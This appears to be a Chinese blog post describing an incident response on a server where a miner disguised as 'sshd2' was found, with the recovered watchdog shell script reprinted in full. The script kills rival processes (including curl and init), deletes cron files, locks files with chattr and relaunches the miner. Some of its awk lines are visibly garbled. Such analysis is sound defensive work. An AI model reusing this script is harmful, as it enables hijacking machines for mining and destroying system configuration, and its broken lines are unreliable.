python挖矿脚本代码_一个挖矿脚本
大家好,又见面了,我是你们的朋友全栈君。
遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高
仔细查看就知道和sshd是两个完全不同的进程,取名sshd2应该只是为了迷惑用户
ps -ef查看到父进程是一个/tmp/javax/config.sh, 这个文件在当前系统已经删除了,所以只能按照pid号通过lsof -p PID查看打开的文件句柄
在/proc/PID/fd里面顺利找到执行脚本
#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
while [ 1 ]
do
p=$(ps auxf|grep -v grep|grep sshd2|wc -l)
if [ ${p} -eq 0 ];
then
ps auxf|grep -v grep | awk ‘{if(3>=80.0) print
fi
chattr -i /var/spool/cron/root
chattr -i /var/spool/cron/crontabs/root
chattr -i /usr/local/bin/dns
pkill 6Tx3Wq
rm -f /tmp/6Tx3Wq
killall -9 38c985b26d38da0cbcc9f8ae3527e8e3b
killall -9 /tmp/.sysinfo/*
rm -f /tmp/.sysinfo/*
chattr +i /tmp/.sysinfo
rm -f /var/spool/cron/root
rm -f /var/spool/cron/backup.db
rm -f /var/spool/cron/dump.rdb
rm -f /var/spool/cron/jw
rm -f /var/spool/cron/uo
rm -f /var/spool/cron/vf
rm -f /tmp/root
rm -f /tmp/backup.db
rm -f /tmp/dump.rdb
rm -f /tmp/root
rm -f /var/spool/cron/crontabs/root
rm -f /var/spool/cron/crontabs/dump.rdb
killall -9 kworkerds
chattr -i /etc/cron.d/root
chattr -i /etc/cron.d/apache
chattr -i /etc/cron.d/0hourly
rm -f /etc/cron.d/root
rm -f /etc/cron.d/apache
rm -f /etc/cron.d/0hourly
rm -f /tmp/kworkerds
rm -f /var/tmp/kworkerds
rm -f /etc/cron.hourly/oanacroner
rm -f /etc/cron.hourly/oanacrona
rm -f /etc/cron.daily/oanacroner
rm -f /etc/cron.daily/oanacrona
rm -f /etc/cron.monthly/oanacroner
rm -f /usr/local/bin/dns
pkill .systemcero
pkill vTtHH
pkill -f /tmp/just4root
pkill -f /tmp/just4copy
pkill -f /tmp/dc_name
pkill x7
pkill cloudupdate
pkill diskmanagerd
pkill curl
pkill jspserv
pkill init
pkill sysupdate
pkill sysguard
pkill networkservice
pkill watchbog
rm -f /usr/share/watchbog/watchbog
rm -f /bin/httpsntp
rm -f /bin/ftpsntp
rm -f /tmp/.systemcero
rm -f /tmp/vTtHH
rm -f /usr/bin/.systemcero
rm -f /usr/bin/cloudupdate
rm -f /usr/bin/diskmanagerd
rm -f /lib/libterminfo.so
rm -f /tmp/config.json
rm -f /var/tmp/jspserv
rm -f /etc/update.sh
chattr -i /etc/sysupdate
rm -f /etc/sysupdate
rm -f /etc/config.json
echo >/tmp/6Tx3Wq
echo >/tmp/vTtHH
chattr +i /tmp/6Tx3Wq
chattr +i /tmp/vTtHH
p=(ps auxf|grep sshd2|awk ‘{if3>=70.0) print
name=””$p
if [ -z “$name” ]
then
ps auxf|grep -v grep | awk ‘{if(3>=80.0) print
nohup /tmp/javax/sshd2 &>>/dev/null &
else
:
fi
sleep 60
done
从脚本的删除动作来看,可能是通过redis的漏洞进来的,脚本似乎还想努力不让监控发现
修复方案
时间短,修复不是我来操作的。初步并没有发现隐藏的激活方式,所以按照上面脚本的内容反向处理一下应该就可以了,注意防范redis的漏洞。
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/158472.html原文链接:https://javaforall.cn
相关文章
- python求逆矩阵的方法,Python 如何求矩阵的逆「建议收藏」
- python画图小代码
- 用python写一个简单的表白代码
- python表情代码_Python实现表情包的代码实例[通俗易懂]
- python输出unicode编码_Python以utf8编码读取文件
- python用ARIMA模型预测CO2浓度时间序列实现|附代码数据
- 超参数黑盒(Black-box)优化的Python代码示例
- Python基于粒子群优化的投资组合优化研究|附代码数据
- C++到Python全搞定,教你如何为FastDeploy贡献代码
- 40 行 Python 代码,写一个 CPU!
- 使用Python和SAS Viya分析社交网络|附代码数据
- Python开发-pandas导入数据库
- 【Python】PyCharm 基本使用 ② ( Python 工程设置 | 更改 Theme 主题 | 创建 Python 文件 | 编写运行代码 )
- Python 动态爱心表白代码,赶紧拿去用吧
- 计算时间差,时间加减运算python代码详解编程语言
- Python学习:6.python内置函数详解编程语言
- python 安全编码&代码审计
- python来实现 运维堡垒机(跳板机)系统
- CherryTree 是一个支持无限层级分类的笔记软件,Python 编写,支持富文本编辑和代码高亮,支持 Mac、Linux、Windows平台。
- 从 Python 连接到 MySQL:实现更多强大的数据库应用(python和mysql)
- python双向链表实现实例代码